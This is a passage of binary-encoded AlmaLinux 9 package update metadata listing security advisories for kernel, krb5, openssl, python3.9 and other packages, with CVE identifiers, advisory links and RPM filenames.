NetworkManager-libnm-1.48.10-2.el9_5.alma.1.i686.rpm�T�NetworkManager-adsl-1.48.10-2.el9_5.alma.1.x86_64.rpm�X�NetworkManager-team-1.48.10-2.el9_5.alma.1.x86_64.rpm�Y�NetworkManager-tui-1.48.10-2.el9_5.alma.1.x86_64.rpm����%�s
�;�vBBBBBBsecurityLow: cockpit security update,�9���2https://access.redhat.com/errata/RHSA-2024:9325RHSA-2024:9325RHSA-2024:9325https://access.redhat.com/security/cve/CVE-2024-6126CVE-2024-6126CVE-2024-6126https://bugzilla.redhat.com/22928972292897https://errata.almalinux.org/9/ALSA-2024-9325.htmlALSA-2024:9325ALSA-2024:9325�F�hcockpit-bridge-323.1-1.el9_5.x86_64.rpm�P�hcockpit-ws-323.1-1.el9_5.x86_64.rpm�O�hcockpit-323.1-1.el9_5.x86_64.rpm�H�hcockpit-system-323.1-1.el9_5.noarch.rpm�G�hcockpit-doc-323.1-1.el9_5.noarch.rpm�F�hcockpit-bridge-323.1-1.el9_5.x86_64.rpm�P�hcockpit-ws-323.1-1.el9_5.x86_64.rpm�O�hcockpit-323.1-1.el9_5.x86_64.rpm�H�hcockpit-system-323.1-1.el9_5.noarch.rpm�G�hcockpit-doc-323.1-1.el9_5.noarch.rpm����K�t
�<�~BBBBBBBBBBBBBBBsecurityModerate: krb5 security update,��J�https://access.redhat.com/errata/RHSA-2024:9331RHSA-2024:9331RHSA-2024:9331https://access.redhat.com/security/cve/CVE-2024-26458CVE-2024-26458CVE-2024-26458https://access.redhat.com/security/cve/CVE-2024-26461CVE-2024-26461CVE-2024-26461https://access.redhat.com/security/cve/CVE-2024-26462CVE-2024-26462CVE-2024-26462https://bugzilla.redhat.com/22667312266731https://bugzilla.redhat.com/22667402266740https://bugzilla.redhat.com/22667422266742https://errata.almalinux.org/9/ALSA-2024-9331.htmlALSA-2024:9331ALSA-2024:9331�$�krb5-libs-1.21.1-3.el9.i686.rpm�(�libkadm5-1.21.1-3.el9.x86_64.rpm�&�krb5-server-1.21.1-3.el9.i686.rpm�'�krb5-server-ldap-1.21.1-3.el9.x86_64.rpm�$�krb5-libs-1.21.1-3.el9.x86_64.rpm�%�krb5-pkinit-1.21.1-3.el9.i686.rpm�&�krb5-server-1.21.1-3.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-3.el9.i686.rpm�%�krb5-pkinit-1.21.1-3.el9.x86_64.rpm�(�libkadm5-1.21.1-3.el9.i686.rpm�p�krb5-workstation-1.21.1-3.el9.x86_64.rpm�$�krb5-libs-1.21.1-3.el9.i686.rpm�(�libkadm5-1.21.1-3.el9.x86_64.rpm�&�krb5-server-1.21.1-3.el9.i686.rpm�'�krb5-server-ldap-1.21.1-3.el9.x86_64.rpm�$�krb5-libs-1.21.1-3.el9.x86_64.rpm�%�krb5-pkinit-1.21.1-3.el9.i686.rpm�&�krb5-server-1.21.1-3.el9.x86_64.rpm�'�krb5-server-ldap-1.21.1-3.el9.i686.rpm�%�krb5-pkinit-1.21.1-3.el9.x86_64.rpm�(�libkadm5-1.21.1-3.el9.i686.rpm�p�krb5-workstation-1.21.1-3.el9.x86_64.rpm���h�u
�=�OBBBsecurityLow: openssl security update,�9��U�L
https://access.redhat.com/errata/RHSA-2024:9333RHSA-2024:9333RHSA-2024:9333https://access.redhat.com/security/cve/CVE-2024-2511CVE-2024-2511CVE-2024-2511https://access.redhat.com/security/cve/CVE-2024-4603CVE-2024-4603CVE-2024-4603https://access.redhat.com/security/cve/CVE-2024-4741CVE-2024-4741CVE-2024-4741https://access.redhat.com/security/cve/CVE-2024-5535CVE-2024-5535CVE-2024-5535https://bugzilla.redhat.com/22740202274020https://bugzilla.redhat.com/22810292281029https://bugzilla.redhat.com/22837572283757https://bugzilla.redhat.com/22945812294581https://errata.almalinux.org/9/ALSA-2024-9333.htmlALSA-2024:9333ALSA-2024:9333�:�zopenssl-3.2.2-6.el9_5.x86_64.rpm��zopenssl-libs-3.2.2-6.el9_5.x86_64.rpm��zopenssl-libs-3.2.2-6.el9_5.i686.rpm�:�zopenssl-3.2.2-6.el9_5.x86_64.rpm��zopenssl-libs-3.2.2-6.el9_5.x86_64.rpm��zopenssl-libs-3.2.2-6.el9_5.i686.rpm����e�v
�>�TBBBsecurityModerate: python3.9 security update,��!�khttps://access.redhat.com/errata/RHSA-2024:9371RHSA-2024:9371RHSA-2024:9371https://access.redhat.com/security/cve/CVE-2024-8088CVE-2024-8088CVE-2024-8088https://bugzilla.redhat.com/23073702307370https://errata.almalinux.org/9/ALSA-2024-9371.htmlALSA-2024:9371ALSA-2024:9371-�python3-libs-3.9.19-8.el9.i686.rpm-�python3-libs-3.9.19-8.el9.x86_64.rpm��python3-3.9.19-8.el9.x86_64.rpm-�python3-libs-3.9.19-8.el9.i686.rpm-�python3-libs-3.9.19-8.el9.x86_64.rpm��python3-3.9.19-8.el9.x86_64.rpm���4�w
��securityModerate: microcode_ctl security update,���dhttps://access.redhat.com/errata/RHSA-2024:9401RHSA-2024:9401RHSA-2024:9401https://access.redhat.com/security/cve/CVE-2023-22655CVE-2023-22655CVE-2023-22655https://access.redhat.com/security/cve/CVE-2023-28746CVE-2023-28746CVE-2023-28746https://access.redhat.com/security/cve/CVE-2023-38575CVE-2023-38575CVE-2023-38575https://access.redhat.com/security/cve/CVE-2023-39368CVE-2023-39368CVE-2023-39368https://access.redhat.com/security/cve/CVE-2023-43490CVE-2023-43490CVE-2023-43490https://access.redhat.com/security/cve/CVE-2023-45733CVE-2023-45733CVE-2023-45733https://access.redhat.com/security/cve/CVE-2023-46103CVE-2023-46103CVE-2023-46103https://bugzilla.redhat.com/22706982270698https://bugzilla.redhat.com/22707002270700https://bugzilla.redhat.com/22707012270701https://bugzilla.redhat.com/22707032270703https://bugzilla.redhat.com/22707042270704https://bugzilla.redhat.com/22922962292296https://bugzilla.redhat.com/22923002292300https://errata.almalinux.org/9/ALSA-2024-9401.htmlALSA-2024:9401ALSA-2024:9401�r�microcode_ctl-20240910-1.el9_5.noarch.rpm�r�microcode_ctl-20240910-1.el9_5.noarch.rpm����3�x
�?�[BsecurityModerate: libgcrypt security update,��p�
https://access.redhat.com/errata/RHSA-2024:9404RHSA-2024:9404RHSA-2024:9404https://access.redhat.com/security/cve/CVE-2024-2236CVE-2024-2236CVE-2024-2236https://bugzilla.redhat.com/22452182245218https://errata.almalinux.org/9/ALSA-2024-9404.htmlALSA-2024:9404ALSA-2024:9404�3�Ylibgcrypt-1.10.0-11.el9.x86_64.rpm�3�Ylibgcrypt-1.10.0-11.el9.i686.rpm�3�Ylibgcrypt-1.10.0-11.el9.x86_64.rpm�3�Ylibgcrypt-1.10.0-11.el9.i686.rpm����H�y
��^BsecurityLow: vim security update,�9��z�thttps://access.redhat.com/errata/RHSA-2024:9405RHSA-2024:9405RHSA-2024:9405https://access.redhat.com/security/cve/CVE-2021-3903CVE-2021-3903CVE-2021-3903https://bugzilla.redhat.com/20185582018558https://errata.almalinux.org/9/ALSA-2024-9405.htmlALSA-2024:9405ALSA-2024:9405�7�vim-filesystem-8.2.2637-21.el9.noarch.rpm�S�vim-minimal-8.2.2637-21.el9.x86_64.rpm�7�vim-filesystem-8.2.2637-21.el9.noarch.rpm�S�vim-minimal-8.2.2637-21.el9.x86_64.rpm����a�z
��aBBBsecurityModerate: bluez security update,��n�+https://access.redhat.com/errata/RHSA-2024:9413RHSA-2024:9413RHSA-2024:9413https://access.redhat.com/security/cve/CVE-2023-27349CVE-2023-27349CVE-2023-27349https://access.redhat.com/security/cve/CVE-2023-44431CVE-2023-44431CVE-2023-44431https://access.redhat.com/security/cve/CVE-2023-45866CVE-2023-45866CVE-2023-45866https://access.redhat.com/security/cve/CVE-2023-50229CVE-2023-50229CVE-2023-50229https://access.redhat.com/security/cve/CVE-2023-50230CVE-2023-50230CVE-2023-50230https://access.redhat.com/security/cve/CVE-2023-51580CVE-2023-51580CVE-2023-51580https://access.redhat.com/security/cve/CVE-2023-51589CVE-2023-51589CVE-2023-51589https://access.redhat.com/security/cve/CVE-2023-51592CVE-2023-51592CVE-2023-51592https://access.redhat.com/security/cve/CVE-2023-51594CVE-2023-51594CVE-2023-51594https://access.redhat.com/security/cve/CVE-2023-51596CVE-2023-51596CVE-2023-51596https://bugzilla.redhat.com/22533912253391https://bugzilla.redhat.com/22787872278787https://bugzilla.redhat.com/22789452278945https://bugzilla.redhat.com/22789552278955https://bugzilla.redhat.com/22789622278962https://bugzilla.redhat.com/22789652278965https://bugzilla.redhat.com/22789672278967https://bugzilla.redhat.com/22789692278969https://bugzilla.redhat.com/22789722278972https://bugzilla.redhat.com/22789742278974https://errata.almalinux.org/9/ALSA-2024-9413.htmlALSA-2024:9413ALSA-2024:9413�$�$bluez-libs-5.72-2.el9.x86_64.rpm�U�$bluez-5.72-2.el9.x86_64.rpm�$�$bluez-libs-5.72-2.el9.i686.rpm�$�$bluez-libs-5.72-2.el9.x86_64.rpm�U�$bluez-5.72-2.el9.x86_64.rpm�$�$bluez-libs-5.72-2.el9.i686.rpm����t�{
�'�&securityModerate: python-dns security update,���qhttps://access.redhat.com/errata/RHSA-2024:9423RHSA-2024:9423RHSA-2024:9423https://access.redhat.com/security/cve/CVE-2023-29483CVE-2023-29483CVE-2023-29483https://bugzilla.redhat.com/22745202274520https://errata.almalinux.org/9/ALSA-2024-9423.htmlALSA-2024:9423ALSA-2024:9423�'�python3-dns-2.6.1-3.el9.noarch.rpm�'�python3-dns-2.6.1-3.el9.noarch.rpm����0�|
�*�hsecurityLow: tpm2-tools security update,�9��
�'https://access.redhat.com/errata/RHSA-2024:9424RHSA-2024:9424RHSA-2024:9424https://access.redhat.com/security/cve/CVE-2024-29038CVE-2024-29038CVE-2024-29038https://access.redhat.com/security/cve/CVE-2024-29039CVE-2024-29039CVE-2024-29039https://bugzilla.redhat.com/22780712278071https://bugzilla.redhat.com/22780752278075https://errata.almalinux.org/9/ALSA-2024-9424.htmlALSA-2024:9424ALSA-2024:9424�~�4tpm2-tools-5.2-4.el9.x86_64.rpm�~�4tpm2-tools-5.2-4.el9.x86_64.rpm����5�}
�-�ksecurityLow: nano security update,�9��1�Ahttps://access.redhat.com/errata/RHSA-2024:9430RHSA-2024:9430RHSA-2024:9430https://access.redhat.com/security/cve/CVE-2024-5742CVE-2024-5742CVE-2024-5742https://bugzilla.redhat.com/22785742278574https://errata.almalinux.org/9/ALSA-2024-9430.htmlALSA-2024:9430ALSA-2024:9430�f�5nano-5.6.1-6.el9.x86_64.rpm�f�5nano-5.6.1-6.el9.x86_64.rpm����5�~
��nsecurityImportant: bubblewrap and flatpak security update,'��r�Rhttps://access.redhat.com/errata/RHSA-2024:9449RHSA-2024:9449RHSA-2024:9449https://access.redhat.com/security/cve/CVE-2024-42472CVE-2024-42472CVE-2024-42472https://errata.almalinux.org/9/ALSA-2024-9449.htmlALSA-2024:9449ALSA-2024:9449�]�bubblewrap-0.4.1-8.el9_5.x86_64.rpm�]�bubblewrap-0.4.1-8.el9_5.x86_64.rpm����6�
��pBBBsecurityModerate: python3.9 security update,��D�\https://access.redhat.com/errata/RHSA-2024:9468RHSA-2024:9468RHSA-2024:9468https://access.redhat.com/security/cve/CVE-2024-6232CVE-2024-6232CVE-2024-6232https://bugzilla.redhat.com/23094262309426https://errata.almalinux.org/9/ALSA-2024-9468.htmlALSA-2024:9468ALSA-2024:9468-�python3-libs-3.9.19-8.el9_5.1.i686.rpm��python3-3.9.19-8.el9_5.1.x86_64.rpm-�python3-libs-3.9.19-8.el9_5.1.x86_64.rpm-�python3-libs-3.9.19-8.el9_5.1.i686.rpm��python3-3.9.19-8.el9_5.1.x86_64.rpm-�python3-libs-3.9.19-8.el9_5.1.x86_64.rpm�����
��uBsecurityLow: cups security update,�9�� �)https://access.redhat.com/errata/RHSA-2024:9470RHSA-2024:9470RHSA-2024:9470https://access.redhat.com/security/cve/CVE-2024-47175CVE-2024-47175CVE-2024-47175https://bugzilla.redhat.com/23142562314256https://errata.almalinux.org/9/ALSA-2024-9470.htmlALSA-2024:9470ALSA-2024:9470�+�ocups-libs-2.3.3op2-31.el9_5.i686.rpm�+�ocups-libs-2.3.3op2-31.el9_5.x86_64.rpm�+�ocups-libs-2.3.3op2-31.el9_5.i686.rpm�+�ocups-libs-2.3.3op2-31.el9_5.x86_64.rpm����S�
��xBBBBBBBBBBBBBBBsecurityImportant: krb5 security update,'��I�Shttps://access.redhat.com/errata/RHSA-2024:9474RHSA-2024:9474RHSA-2024:9474https://access.redhat.com/security/cve/CVE-2024-3596CVE-2024-3596CVE-2024-3596https://bugzilla.redhat.com/22632402263240https://errata.almalinux.org/9/ALSA-2024-9474.htmlALSA-2024:9474ALSA-2024:9474�'�krb5-server-ldap-1.21.1-4.el9_5.i686.rpm�%�krb5-pkinit-1.21.1-4.el9_5.x86_64.rpm�'�krb5-server-ldap-1.21.1-4.el9_5.x86_64.rpm�&�krb5-server-1.21.1-4.el9_5.i686.rpm�$�krb5-libs-1.21.1-4.el9_5.x86_64.rpm�&�krb5-server-1.21.1-4.el9_5.x86_64.rpm�$�krb5-libs-1.21.1-4.el9_5.i686.rpm�%�krb5-pkinit-1.21.1-4.el9_5.i686.rpm�(�libkadm5-1.21.1-4.el9_5.i686.rpm�p�krb5-workstation-1.21.1-4.el9_5.x86_64.rpm�(�libkadm5-1.21.1-4.el9_5.x86_64.rpm�'�krb5-server-ldap-1.21.1-4.el9_5.i686.rpm�%�krb5-pkinit-1.21.1-4.el9_5.x86_64.rpm�'�krb5-server-ldap-1.21.1-4.el9_5.x86_64.rpm�&�krb5-server-1.21.1-4.el9_5.i686.rpm�$�krb5-libs-1.21.1-4.el9_5.x86_64.rpm�&�krb5-server-1.21.1-4.el9_5.x86_64.rpm�$�krb5-libs-1.21.1-4.el9_5.i686.rpm�%�krb5-pkinit-1.21.1-4.el9_5.i686.rpm�(�libkadm5-1.21.1-4.el9_5.i686.rpm�p�krb5-workstation-1.21.1-4.el9_5.x86_64.rpm�(�libkadm5-1.21.1-4.el9_5.x86_64.rpm����Q�
��IBsecurityModerate: expat security update,���Ghttps://access.redhat.com/errata/RHSA-2024:9541RHSA-2024:9541RHSA-2024:9541https://access.redhat.com/security/cve/CVE-2024-50602CVE-2024-50602CVE-2024-50602https://bugzilla.redhat.com/23219872321987https://errata.almalinux.org/9/ALSA-2024-9541.htmlALSA-2024:9541ALSA-2024:9541�"�xexpat-2.5.0-3.el9_5.1.x86_64.rpm�"�xexpat-2.5.0-3.el9_5.1.i686.rpm�"�xexpat-2.5.0-3.el9_5.1.x86_64.rpm�"�xexpat-2.5.0-3.el9_5.1.i686.rpm����U�
��LBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,��c�'https://access.redhat.com/errata/RHSA-2024:9605RHSA-2024:9605RHSA-2024:9605https://access.redhat.com/security/cve/CVE-2024-42283CVE-2024-42283CVE-2024-42283https://access.redhat.com/security/cve/CVE-2024-46824CVE-2024-46824CVE-2024-46824https://access.redhat.com/security/cve/CVE-2024-46858CVE-2024-46858CVE-2024-46858https://bugzilla.redhat.com/23151762315176https://bugzilla.redhat.com/23152102315210https://errata.almalinux.org/9/ALSA-2024-9605.htmlALSA-2024:9605ALSA-2024:96053kernel-tools-libs-5.14.0-503.14.1.el9_5.x86_64.rpm%3kernel-uki-virt-addons-5.14.0-503.14.1.el9_5.x86_64.rpm23python3-perf-5.14.0-503.14.1.el9_5.x86_64.rpm 3kernel-debug-uki-virt-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-modules-extra-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-modules-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-tools-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-5.14.0-503.14.1.el9_5.x86_64.rpm1�Jbpftool-7.4.0-503.14.1.el9_5.x86_64.rpm3kernel-modules-extra-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-modules-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-modules-core-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-core-5.14.0-503.14.1.el9_5.x86_64.rpm"3kernel-uki-virt-5.14.0-503.14.1.el9_5.x86_64.rpm!3kernel-modules-core-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-abi-stablelists-5.14.0-503.14.1.el9_5.noarch.rpm3kernel-core-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-tools-libs-5.14.0-503.14.1.el9_5.x86_64.rpm%3kernel-uki-virt-addons-5.14.0-503.14.1.el9_5.x86_64.rpm23python3-perf-5.14.0-503.14.1.el9_5.x86_64.rpm 3kernel-debug-uki-virt-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-modules-extra-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-modules-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-tools-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-5.14.0-503.14.1.el9_5.x86_64.rpm1�Jbpftool-7.4.0-503.14.1.el9_5.x86_64.rpm3kernel-modules-extra-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-modules-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-modules-core-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-debug-core-5.14.0-503.14.1.el9_5.x86_64.rpm"3kernel-uki-virt-5.14.0-503.14.1.el9_5.x86_64.rpm!3kernel-modules-core-5.14.0-503.14.1.el9_5.x86_64.rpm3kernel-abi-stablelists-5.14.0-503.14.1.el9_5.noarch.rpm3kernel-core-5.14.0-503.14.1.el9_5.x86_64.rpm����F�
��oBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��
�

https://access.redhat.com/errata/RHSA-2025:0059RHSA-2025:0059RHSA-2025:0059https://access.redhat.com/security/cve/CVE-2024-46713CVE-2024-46713CVE-2024-46713https://access.redhat.com/security/cve/CVE-2024-50208CVE-2024-50208CVE-2024-50208https://access.redhat.com/security/cve/CVE-2024-50252CVE-2024-50252CVE-2024-50252https://access.redhat.com/security/cve/CVE-2024-53122CVE-2024-53122CVE-2024-53122https://bugzilla.redhat.com/23122212312221https://bugzilla.redhat.com/23246112324611https://bugzilla.redhat.com/23248982324898https://bugzilla.redhat.com/23299322329932https://errata.almalinux.org/9/ALSA-2025-0059.htmlALSA-2025:0059ALSA-2025:00597kernel-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-abi-stablelists-5.14.0-503.21.1.el9_5.noarch.rpm1�Nbpftool-7.4.0-503.21.1.el9_5.x86_64.rpm 7kernel-debug-uki-virt-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-tools-libs-5.14.0-503.21.1.el9_5.x86_64.rpm27python3-perf-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-core-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-modules-extra-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-modules-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-modules-extra-5.14.0-503.21.1.el9_5.x86_64.rpm!7kernel-modules-core-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-core-5.14.0-503.21.1.el9_5.x86_64.rpm"7kernel-uki-virt-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-modules-core-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-tools-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-modules-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-5.14.0-503.21.1.el9_5.x86_64.rpm%7kernel-uki-virt-addons-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-abi-stablelists-5.14.0-503.21.1.el9_5.noarch.rpm1�Nbpftool-7.4.0-503.21.1.el9_5.x86_64.rpm 7kernel-debug-uki-virt-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-tools-libs-5.14.0-503.21.1.el9_5.x86_64.rpm27python3-perf-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-core-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-modules-extra-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-modules-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-modules-extra-5.14.0-503.21.1.el9_5.x86_64.rpm!7kernel-modules-core-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-core-5.14.0-503.21.1.el9_5.x86_64.rpm"7kernel-uki-virt-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-modules-core-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-tools-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-modules-5.14.0-503.21.1.el9_5.x86_64.rpm7kernel-debug-5.14.0-503.21.1.el9_5.x86_64.rpm%7kernel-uki-virt-addons-5.14.0-503.21.1.el9_5.x86_64.rpm����>�
�	�RsecurityImportant: rsync security update&'���8https://access.redhat.com/errata/RHSA-2025:0324RHSA-2025:0324RHSA-2025:0324https://access.redhat.com/security/cve/CVE-2024-12085CVE-2024-12085CVE-2024-12085https://bugzilla.redhat.com/23305392330539https://errata.almalinux.org/9/ALSA-2025-0324.htmlALSA-2025:0324ALSA-2025:0324�=�+rsync-3.2.3-20.el9_5.1.x86_64.rpm�=�+rsync-3.2.3-20.el9_5.1.x86_64.rpm����d�
�
�TBBBBBBBBBBBBBBBBBsecurityModerate: Security and bug fixes for NetworkManager&��L�Lhttps://access.redhat.com/errata/RHSA-2025:0377RHSA-2025:0377RHSA-2025:0377https://access.redhat.com/security/cve/CVE-2024-3661CVE-2024-3661CVE-2024-3661https://errata.almalinux.org/9/ALSA-2025-0377.htmlALSA-2025:0377ALSA-2025:0377�[�NetworkManager-wwan-1.48.10-5.el9_5.x86_64.rpm�Z�NetworkManager-wifi-1.48.10-5.el9_5.x86_64.rpm�X�NetworkManager-team-1.48.10-5.el9_5.x86_64.rpm�T�NetworkManager-adsl-1.48.10-5.el9_5.x86_64.rpm�U�NetworkManager-bluetooth-1.48.10-5.el9_5.x86_64.rpm�%�NetworkManager-libnm-1.48.10-5.el9_5.x86_64.rpm�Y�NetworkManager-tui-1.48.10-5.el9_5.x86_64.rpm�%�NetworkManager-libnm-1.48.10-5.el9_5.i686.rpm�W�NetworkManager-initscripts-updown-1.48.10-5.el9_5.noarch.rpm�V�NetworkManager-config-server-1.48.10-5.el9_5.noarch.rpm�S�NetworkManager-1.48.10-5.el9_5.x86_64.rpm�[�NetworkManager-wwan-1.48.10-5.el9_5.x86_64.rpm�Z�NetworkManager-wifi-1.48.10-5.el9_5.x86_64.rpm�X�NetworkManager-team-1.48.10-5.el9_5.x86_64.rpm�T�NetworkManager-adsl-1.48.10-5.el9_5.x86_64.rpm�U�NetworkManager-bluetooth-1.48.10-5.el9_5.x86_64.rpm�%�NetworkManager-libnm-1.48.10-5.el9_5.x86_64.rpm�Y�NetworkManager-tui-1.48.10-5.el9_5.x86_64.rpm�%�NetworkManager-libnm-1.48.10-5.el9_5.i686.rpm�W�NetworkManager-initscripts-updown-1.48.10-5.el9_5.noarch.rpm�V�NetworkManager-config-server-1.48.10-5.el9_5.noarch.rpm�S�NetworkManager-1.48.10-5.el9_5.x86_64.rpm����(�
��gBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&���Ehttps://access.redhat.com/errata/RHSA-2025:0578RHSA-2025:0578RHSA-2025:0578https://access.redhat.com/security/cve/CVE-2024-50154CVE-2024-50154CVE-2024-50154https://access.redhat.com/security/cve/CVE-2024-50275CVE-2024-50275CVE-2024-50275https://access.redhat.com/security/cve/CVE-2024-53088CVE-2024-53088CVE-2024-53088https://bugzilla.redhat.com/23243132324313https://bugzilla.redhat.com/23271982327198https://bugzilla.redhat.com/23273282327328https://errata.almalinux.org/9/ALSA-2025-0578.htmlALSA-2025:0578ALSA-2025:05788kernel-debug-modules-core-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-tools-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-modules-extra-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-tools-libs-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-modules-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-abi-stablelists-5.14.0-503.22.1.el9_5.noarch.rpm"8kernel-uki-virt-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-modules-extra-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-modules-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-core-5.14.0-503.22.1.el9_5.x86_64.rpm 8kernel-debug-uki-virt-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-core-5.14.0-503.22.1.el9_5.x86_64.rpm1�Obpftool-7.4.0-503.22.1.el9_5.x86_64.rpm!8kernel-modules-core-5.14.0-503.22.1.el9_5.x86_64.rpm%8kernel-uki-virt-addons-5.14.0-503.22.1.el9_5.x86_64.rpm28python3-perf-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-modules-core-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-tools-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-modules-extra-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-tools-libs-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-modules-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-abi-stablelists-5.14.0-503.22.1.el9_5.noarch.rpm"8kernel-uki-virt-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-modules-extra-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-modules-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-core-5.14.0-503.22.1.el9_5.x86_64.rpm 8kernel-debug-uki-virt-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-debug-core-5.14.0-503.22.1.el9_5.x86_64.rpm1�Obpftool-7.4.0-503.22.1.el9_5.x86_64.rpm!8kernel-modules-core-5.14.0-503.22.1.el9_5.x86_64.rpm%8kernel-uki-virt-addons-5.14.0-503.22.1.el9_5.x86_64.rpm28python3-perf-5.14.0-503.22.1.el9_5.x86_64.rpm8kernel-5.14.0-503.22.1.el9_5.x86_64.rpm��Օ/�
��JBBBsecurityModerate: bzip2 security update&��]�https://access.redhat.com/errata/RHSA-2025:0925RHSA-2025:0925RHSA-2025:0925https://access.redhat.com/security/cve/CVE-2019-12900CVE-2019-12900CVE-2019-12900https://bugzilla.redhat.com/23320752332075https://errata.almalinux.org/9/ALSA-2025-0925.htmlALSA-2025:0925ALSA-2025:0925�W�qbzip2-1.0.8-10.el9_5.x86_64.rpm�%�qbzip2-libs-1.0.8-10.el9_5.i686.rpm�%�qbzip2-libs-1.0.8-10.el9_5.x86_64.rpm�W�qbzip2-1.0.8-10.el9_5.x86_64.rpm�%�qbzip2-libs-1.0.8-10.el9_5.i686.rpm�%�qbzip2-libs-1.0.8-10.el9_5.x86_64.rpm�����	
�
�OBBBsecurityImportant: python3.9 security update&'��n�ghttps://access.redhat.com/errata/RHSA-2025:10136RHSA-2025:10136RHSA-2025:10136https://access.redhat.com/security/cve/CVE-2024-12718CVE-2024-12718CVE-2024-12718https://access.redhat.com/security/cve/CVE-2025-4138CVE-2025-4138CVE-2025-4138https://access.redhat.com/security/cve/CVE-2025-4330CVE-2025-4330CVE-2025-4330https://access.redhat.com/security/cve/CVE-2025-4435CVE-2025-4435CVE-2025-4435https://access.redhat.com/security/cve/CVE-2025-4517CVE-2025-4517CVE-2025-4517https://bugzilla.redhat.com/23700102370010https://bugzilla.redhat.com/23700132370013https://bugzilla.redhat.com/23700142370014https://bugzilla.redhat.com/23700162370016https://bugzilla.redhat.com/23724262372426https://errata.almalinux.org/9/ALSA-2025-10136.htmlALSA-2025:10136ALSA-2025:10136��python3-3.9.21-2.el9_6.1.x86_64.rpm-�python3-libs-3.9.21-2.el9_6.1.i686.rpm-�python3-libs-3.9.21-2.el9_6.1.x86_64.rpm��python3-3.9.21-2.el9_6.1.x86_64.rpm-�python3-libs-3.9.21-2.el9_6.1.i686.rpm-�python3-libs-3.9.21-2.el9_6.1.x86_64.rpm��l�

��TBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��U�]https://access.redhat.com/errata/RHSA-2025:10379RHSA-2025:10379RHSA-2025:10379https://access.redhat.com/security/cve/CVE-2022-49846CVE-2022-49846CVE-2022-49846https://access.redhat.com/security/cve/CVE-2025-21759CVE-2025-21759CVE-2025-21759https://access.redhat.com/security/cve/CVE-2025-21887CVE-2025-21887CVE-2025-21887https://access.redhat.com/security/cve/CVE-2025-22004CVE-2025-22004CVE-2025-22004https://access.redhat.com/security/cve/CVE-2025-37799CVE-2025-37799CVE-2025-37799https://bugzilla.redhat.com/23485962348596https://bugzilla.redhat.com/23554052355405https://bugzilla.redhat.com/23571422357142https://bugzilla.redhat.com/23634322363432https://bugzilla.redhat.com/23638762363876https://errata.almalinux.org/9/ALSA-2025-10379.htmlALSA-2025:10379ALSA-2025:10379Xkernel-debug-modules-extra-5.14.0-570.25.1.el9_6.x86_64.rpm"Xkernel-uki-virt-5.14.0-570.25.1.el9_6.x86_64.rpm%Xkernel-uki-virt-addons-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-5.